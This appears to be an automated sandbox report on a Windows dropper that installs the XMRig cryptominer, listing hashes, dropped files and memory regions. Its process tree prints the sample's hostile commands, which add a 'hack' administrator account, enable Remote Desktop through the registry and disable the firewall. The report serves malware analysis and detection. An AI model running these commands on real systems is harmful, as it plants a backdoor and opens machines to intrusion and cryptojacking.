Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    09-10-2023 08:47

General

  • Target

    ffe5563907fa514d018e45dacb1a4291ae9bea92695afd161fc662150ab09fd8.exe

  • Size

    3.7MB

  • MD5

    daa9a5772e8334d165ac41c1021b12fb

  • SHA1

    f9b4a2b63b4dbef8a44ab58087cafb64e82494ca

  • SHA256

    ffe5563907fa514d018e45dacb1a4291ae9bea92695afd161fc662150ab09fd8

  • SHA512

    145130aa35c14ee09d40ca8dce093178d8e3daf074f73ed3f05100a7fce933b3eeabc4f41ff7b582128eba9d332f60bb03ae5c64693e757aed251d954b253252

  • SSDEEP

    98304:7lVs9I7KeKJFWvapUB8cDjgALr99t58JTvmOH6zsa3NEI:BVLbw90jgALrt2JTeA6zL3NEI

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 18 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ffe5563907fa514d018e45dacb1a4291ae9bea92695afd161fc662150ab09fd8.exe
    "C:\Users\Admin\AppData\Local\Temp\ffe5563907fa514d018e45dacb1a4291ae9bea92695afd161fc662150ab09fd8.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bwclient.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bwclient.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c net user hack hack /add
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2648
        • C:\Windows\SysWOW64\net.exe
          net user hack hack /add
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:844
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user hack hack /add
            5⤵
              PID:2992
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c net localgroup administrators hack /add
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:584
          • C:\Windows\SysWOW64\net.exe
            net localgroup administrators hack /add
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1696
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 localgroup administrators hack /add
              5⤵
                PID:2596
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2816
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
              4⤵
                PID:2840
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c netsh firewall set opmode disable
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2852
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall set opmode disable
                4⤵
                • Modifies Windows Firewall
                PID:2888
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c xmrig.exe
              3⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1992
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xmrig.exe
                xmrig.exe
                4⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1588

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bwabout.dll

          Filesize

          930KB

          MD5

          96af57708eab53a1dfc53efa533caf94

          SHA1

          7d91703c68e2701ecc8882079e3b85735801a72d

          SHA256

          8066fd5e892b698072ca4e114ace29928fef187987709018a3cf2dd2aba5c785

          SHA512

          645769d96835a5604e954be3401f5fce461da3e7c482203de069503206941f41923c7354d23bb152f8bb753904e5ef9ffbef628e8d2ddb1e48d935ed3dda6411

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bwclient.exe

          Filesize

          136KB

          MD5

          5cf143d48bb8f8e5ffbb57f45103164c

          SHA1

          3ba1a6511bd074c987af71f4e41cfe0f1c75bd92

          SHA256

          461730c43ed346563ca3447cdc842cc7ba25809e21f747d63961b12b52bf96fe

          SHA512

          cd61e557b3805d3a0c0f567af3088f1152f5e8054db684347c185d5f6b6fdae48f3d8bea7c9b383886223991a2a8a5b5cbcccd8bb515926568e2b52fa9266e3a

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bwclient.exe

          Filesize

          136KB

          MD5

          5cf143d48bb8f8e5ffbb57f45103164c

          SHA1

          3ba1a6511bd074c987af71f4e41cfe0f1c75bd92

          SHA256

          461730c43ed346563ca3447cdc842cc7ba25809e21f747d63961b12b52bf96fe

          SHA512

          cd61e557b3805d3a0c0f567af3088f1152f5e8054db684347c185d5f6b6fdae48f3d8bea7c9b383886223991a2a8a5b5cbcccd8bb515926568e2b52fa9266e3a

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bwgdiplus.dll

          Filesize

          52KB

          MD5

          f155e3a5ac31a0fcda1011c6181300ca

          SHA1

          25cc58cdaa50a1c230ec32735ba2537e40d9275f

          SHA256

          c1696a0610cd9db2fc83f3b4316c375c0dd1978df594a19c539d381e86525f6e

          SHA512

          e708c39135576a6b0b57fa8b134aa623e279f7be8c1b3397e323bc0bedb6efa57429874952763f8d0421464e17ea543728b2882a45d1af651505f0fbe68544a2

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bwiedll.dll

          Filesize

          40KB

          MD5

          af092041facf767edab1194db2becd6d

          SHA1

          21912b20dd9fd20b664c1e5535a5ffcbb43c31a9

          SHA256

          68da32c5abd456bc7018c52a800f0c58dd271ad847b527386fedc5933c0af948

          SHA512

          0394193f7fd4b36b110ba4df657ccfdf39ecf264b768103f9c772cc171ea12f0f6caeecf1b7df4b5469b6a5bbfba3bcd5f62311d2bd1be06b1fac483a3e656ec

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\config.json

          Filesize

          2KB

          MD5

          66f38c96a4901e7b345787c447842b3e

          SHA1

          2aa9b4d1bd2edd5d81bd9725e9318edaee67531f

          SHA256

          2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec

          SHA512

          71757fad29d6d2a257362ed28cde9f249cc8a14e646dee666c9029ea97c72de689cdf8ed5cf0365195a6a6831fe77d82efe5e2fa555c6cc5078f1f29ae8dd68f

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\drawcom.dll

          Filesize

          36KB

          MD5

          1705e1f26817df459fe75a4c6acea6f3

          SHA1

          cde8279f098ec43a02d0a2fc0e7c78eaa2976209

          SHA256

          619d2a31354f6babc3523aa147e03b665d5b7e6c4c1583c939cd3f9256c0e106

          SHA512

          7c58c7b513aefb425b25bb688545429de5fb871ee722739abb27923bfea5821eb8b16cae8642ffd284526942176ad217ce95336638052b98a7491ebe34c3561f

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\viewcom.dll

          Filesize

          44KB

          MD5

          1c1b5794adf161f2d64db6778dd3d79f

          SHA1

          7d63fe3c5a6d1122276db3ca0adea3134afe1a5e

          SHA256

          d35cde5892e37299023ec7f8272117657440f4f2d5f6d7992ec49bc584ec5585

          SHA512

          3a166b37850b07d49b58603daef1f28a933c76cd5f574b8901679999de0311b0be3e3fb97a3762b0b076feb283a754037bc93a7a656167b3e84e21aa1175495c

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\webvcom.dll

          Filesize

          184KB

          MD5

          7f527d0216b6e161de708254369d460d

          SHA1

          daf40943e98557d97064d5ad2bfb0ad535f81682

          SHA256

          618ce44278fd361fae7d328aab216a301903f1a37306750b5d45bbd96c4232fc

          SHA512

          1e0be8c2781f0567add7ca27b8f105d661045310630cf6b52d7a35eaa82ea01f03a8d5dc7b817c704d4b0fe9e994e7d70dc3d18b4e3623274130e9a8a050861c

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\webvdlg.dll

          Filesize

          496KB

          MD5

          c66c8126e41fc55d1b9c2b5c11147d37

          SHA1

          ff3d45dd7a5157816688c33f0bda0f0a60596938

          SHA256

          b6dda8a98d07d8d15b27d7a45afb3096ae0d346c848ae0c6202afc5086a50224

          SHA512

          564f9d712bd9a63bdd8b14524fb0a11c6761252e780bc47425c58962c9ef520615a555cfa921aeb222b1cc2fbe9718b7e924f540d7bf69d6e48b00b27692adf4

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\webvdlgu.dll

          Filesize

          464KB

          MD5

          a06366380009cf10a6b1f256a28492a2

          SHA1

          1cce27917b2af624028bb89cf40c78e9364d7d00

          SHA256

          241da50c06768b72c0c7dd488a1263c06abd8a737001a51b64963907df37d98b

          SHA512

          310419ed1c0f66bd929628df0db71ff07df3ad305c878a7891332c68c95297587fe774bcc0fc4c060feeb178b78629605ed5324920ce99bd2a5e9057f7cfcd79

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\webvrpc.dll

          Filesize

          32KB

          MD5

          4bf39c6fa3be830a42d3d4b277324b65

          SHA1

          45281cfd9ce229557c280e9b956f38b9454a7a0b

          SHA256

          650f59e3a4d949c9321e1635166d36196aa5b468fb97a2f23b869f65c60e47db

          SHA512

          75a02ebecaeaa860b90cda4ca5d1697a5de984c8e581f3dfcbb0a675461e58ef9e9dce2bfd2f562c7bc97e1db40bb183f93cbcd9cf90865e5b4d92e6a4a6d2e1

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xmrig.exe

          Filesize

          7.9MB

          MD5

          4813fa6d610e180b097eae0ce636d2aa

          SHA1

          1e9cd17ea32af1337dd9a664431c809dd8a64d76

          SHA256

          9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc

          SHA512

          5463e61b9583dd7e73fc4c0f14252ce06bb1b24637fdf5c4b96b3452cf486b147c980e365ca6633d89e7cfe245131f528a7ecab2340251cef11cdeb49dac36aa

        • \Users\Admin\AppData\Local\Temp\RarSFX0\bwabout.dll

          Filesize

          930KB

          MD5

          96af57708eab53a1dfc53efa533caf94

          SHA1

          7d91703c68e2701ecc8882079e3b85735801a72d

          SHA256

          8066fd5e892b698072ca4e114ace29928fef187987709018a3cf2dd2aba5c785

          SHA512

          645769d96835a5604e954be3401f5fce461da3e7c482203de069503206941f41923c7354d23bb152f8bb753904e5ef9ffbef628e8d2ddb1e48d935ed3dda6411

        • \Users\Admin\AppData\Local\Temp\RarSFX0\bwclient.exe

          Filesize

          136KB

          MD5

          5cf143d48bb8f8e5ffbb57f45103164c

          SHA1

          3ba1a6511bd074c987af71f4e41cfe0f1c75bd92

          SHA256

          461730c43ed346563ca3447cdc842cc7ba25809e21f747d63961b12b52bf96fe

          SHA512

          cd61e557b3805d3a0c0f567af3088f1152f5e8054db684347c185d5f6b6fdae48f3d8bea7c9b383886223991a2a8a5b5cbcccd8bb515926568e2b52fa9266e3a

        • \Users\Admin\AppData\Local\Temp\RarSFX0\bwclient.exe

          Filesize

          136KB

          MD5

          5cf143d48bb8f8e5ffbb57f45103164c

          SHA1

          3ba1a6511bd074c987af71f4e41cfe0f1c75bd92

          SHA256

          461730c43ed346563ca3447cdc842cc7ba25809e21f747d63961b12b52bf96fe

          SHA512

          cd61e557b3805d3a0c0f567af3088f1152f5e8054db684347c185d5f6b6fdae48f3d8bea7c9b383886223991a2a8a5b5cbcccd8bb515926568e2b52fa9266e3a

        • \Users\Admin\AppData\Local\Temp\RarSFX0\bwclient.exe

          Filesize

          136KB

          MD5

          5cf143d48bb8f8e5ffbb57f45103164c

          SHA1

          3ba1a6511bd074c987af71f4e41cfe0f1c75bd92

          SHA256

          461730c43ed346563ca3447cdc842cc7ba25809e21f747d63961b12b52bf96fe

          SHA512

          cd61e557b3805d3a0c0f567af3088f1152f5e8054db684347c185d5f6b6fdae48f3d8bea7c9b383886223991a2a8a5b5cbcccd8bb515926568e2b52fa9266e3a

        • \Users\Admin\AppData\Local\Temp\RarSFX0\bwclient.exe

          Filesize

          136KB

          MD5

          5cf143d48bb8f8e5ffbb57f45103164c

          SHA1

          3ba1a6511bd074c987af71f4e41cfe0f1c75bd92

          SHA256

          461730c43ed346563ca3447cdc842cc7ba25809e21f747d63961b12b52bf96fe

          SHA512

          cd61e557b3805d3a0c0f567af3088f1152f5e8054db684347c185d5f6b6fdae48f3d8bea7c9b383886223991a2a8a5b5cbcccd8bb515926568e2b52fa9266e3a

        • \Users\Admin\AppData\Local\Temp\RarSFX0\bwgdiplus.dll

          Filesize

          52KB

          MD5

          f155e3a5ac31a0fcda1011c6181300ca

          SHA1

          25cc58cdaa50a1c230ec32735ba2537e40d9275f

          SHA256

          c1696a0610cd9db2fc83f3b4316c375c0dd1978df594a19c539d381e86525f6e

          SHA512

          e708c39135576a6b0b57fa8b134aa623e279f7be8c1b3397e323bc0bedb6efa57429874952763f8d0421464e17ea543728b2882a45d1af651505f0fbe68544a2

        • \Users\Admin\AppData\Local\Temp\RarSFX0\bwiedll.dll

          Filesize

          40KB

          MD5

          af092041facf767edab1194db2becd6d

          SHA1

          21912b20dd9fd20b664c1e5535a5ffcbb43c31a9

          SHA256

          68da32c5abd456bc7018c52a800f0c58dd271ad847b527386fedc5933c0af948

          SHA512

          0394193f7fd4b36b110ba4df657ccfdf39ecf264b768103f9c772cc171ea12f0f6caeecf1b7df4b5469b6a5bbfba3bcd5f62311d2bd1be06b1fac483a3e656ec

        • \Users\Admin\AppData\Local\Temp\RarSFX0\drawcom.dll

          Filesize

          36KB

          MD5

          1705e1f26817df459fe75a4c6acea6f3

          SHA1

          cde8279f098ec43a02d0a2fc0e7c78eaa2976209

          SHA256

          619d2a31354f6babc3523aa147e03b665d5b7e6c4c1583c939cd3f9256c0e106

          SHA512

          7c58c7b513aefb425b25bb688545429de5fb871ee722739abb27923bfea5821eb8b16cae8642ffd284526942176ad217ce95336638052b98a7491ebe34c3561f

        • \Users\Admin\AppData\Local\Temp\RarSFX0\viewcom.dll

          Filesize

          44KB

          MD5

          1c1b5794adf161f2d64db6778dd3d79f

          SHA1

          7d63fe3c5a6d1122276db3ca0adea3134afe1a5e

          SHA256

          d35cde5892e37299023ec7f8272117657440f4f2d5f6d7992ec49bc584ec5585

          SHA512

          3a166b37850b07d49b58603daef1f28a933c76cd5f574b8901679999de0311b0be3e3fb97a3762b0b076feb283a754037bc93a7a656167b3e84e21aa1175495c

        • \Users\Admin\AppData\Local\Temp\RarSFX0\webvcom.dll

          Filesize

          184KB

          MD5

          7f527d0216b6e161de708254369d460d

          SHA1

          daf40943e98557d97064d5ad2bfb0ad535f81682

          SHA256

          618ce44278fd361fae7d328aab216a301903f1a37306750b5d45bbd96c4232fc

          SHA512

          1e0be8c2781f0567add7ca27b8f105d661045310630cf6b52d7a35eaa82ea01f03a8d5dc7b817c704d4b0fe9e994e7d70dc3d18b4e3623274130e9a8a050861c

        • \Users\Admin\AppData\Local\Temp\RarSFX0\webvdlg.dll

          Filesize

          496KB

          MD5

          c66c8126e41fc55d1b9c2b5c11147d37

          SHA1

          ff3d45dd7a5157816688c33f0bda0f0a60596938

          SHA256

          b6dda8a98d07d8d15b27d7a45afb3096ae0d346c848ae0c6202afc5086a50224

          SHA512

          564f9d712bd9a63bdd8b14524fb0a11c6761252e780bc47425c58962c9ef520615a555cfa921aeb222b1cc2fbe9718b7e924f540d7bf69d6e48b00b27692adf4

        • \Users\Admin\AppData\Local\Temp\RarSFX0\webvdlgu.dll

          Filesize

          464KB

          MD5

          a06366380009cf10a6b1f256a28492a2

          SHA1

          1cce27917b2af624028bb89cf40c78e9364d7d00

          SHA256

          241da50c06768b72c0c7dd488a1263c06abd8a737001a51b64963907df37d98b

          SHA512

          310419ed1c0f66bd929628df0db71ff07df3ad305c878a7891332c68c95297587fe774bcc0fc4c060feeb178b78629605ed5324920ce99bd2a5e9057f7cfcd79

        • \Users\Admin\AppData\Local\Temp\RarSFX0\webvrpc.dll

          Filesize

          32KB

          MD5

          4bf39c6fa3be830a42d3d4b277324b65

          SHA1

          45281cfd9ce229557c280e9b956f38b9454a7a0b

          SHA256

          650f59e3a4d949c9321e1635166d36196aa5b468fb97a2f23b869f65c60e47db

          SHA512

          75a02ebecaeaa860b90cda4ca5d1697a5de984c8e581f3dfcbb0a675461e58ef9e9dce2bfd2f562c7bc97e1db40bb183f93cbcd9cf90865e5b4d92e6a4a6d2e1

        • \Users\Admin\AppData\Local\Temp\RarSFX0\xmrig.exe

          Filesize

          7.9MB

          MD5

          4813fa6d610e180b097eae0ce636d2aa

          SHA1

          1e9cd17ea32af1337dd9a664431c809dd8a64d76

          SHA256

          9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc

          SHA512

          5463e61b9583dd7e73fc4c0f14252ce06bb1b24637fdf5c4b96b3452cf486b147c980e365ca6633d89e7cfe245131f528a7ecab2340251cef11cdeb49dac36aa

        • memory/1588-71-0x0000000001C90000-0x0000000001CB0000-memory.dmp

          Filesize

          128KB

        • memory/1588-74-0x0000000001C90000-0x0000000001CB0000-memory.dmp

          Filesize

          128KB

        • memory/1588-102-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-98-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-96-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-68-0x0000000000280000-0x00000000002A0000-memory.dmp

          Filesize

          128KB

        • memory/1588-92-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-72-0x0000000002260000-0x0000000002280000-memory.dmp

          Filesize

          128KB

        • memory/1588-94-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-100-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-75-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-76-0x0000000002260000-0x0000000002280000-memory.dmp

          Filesize

          128KB

        • memory/1588-78-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-80-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-82-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-84-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-86-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-88-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/1588-90-0x000000013FDE0000-0x00000001408E3000-memory.dmp

          Filesize

          11.0MB

        • memory/2772-64-0x00000000003C0000-0x00000000003EE000-memory.dmp

          Filesize

          184KB

        • memory/2772-73-0x000000006C140000-0x000000006C230000-memory.dmp

          Filesize

          960KB

        • memory/2772-44-0x0000000000020000-0x000000000002B000-memory.dmp

          Filesize

          44KB

        • memory/2772-49-0x0000000000220000-0x00000000002A0000-memory.dmp

          Filesize

          512KB

        • memory/2772-57-0x0000000000030000-0x000000000003B000-memory.dmp

          Filesize

          44KB

        • memory/2772-53-0x0000000000320000-0x0000000000398000-memory.dmp

          Filesize

          480KB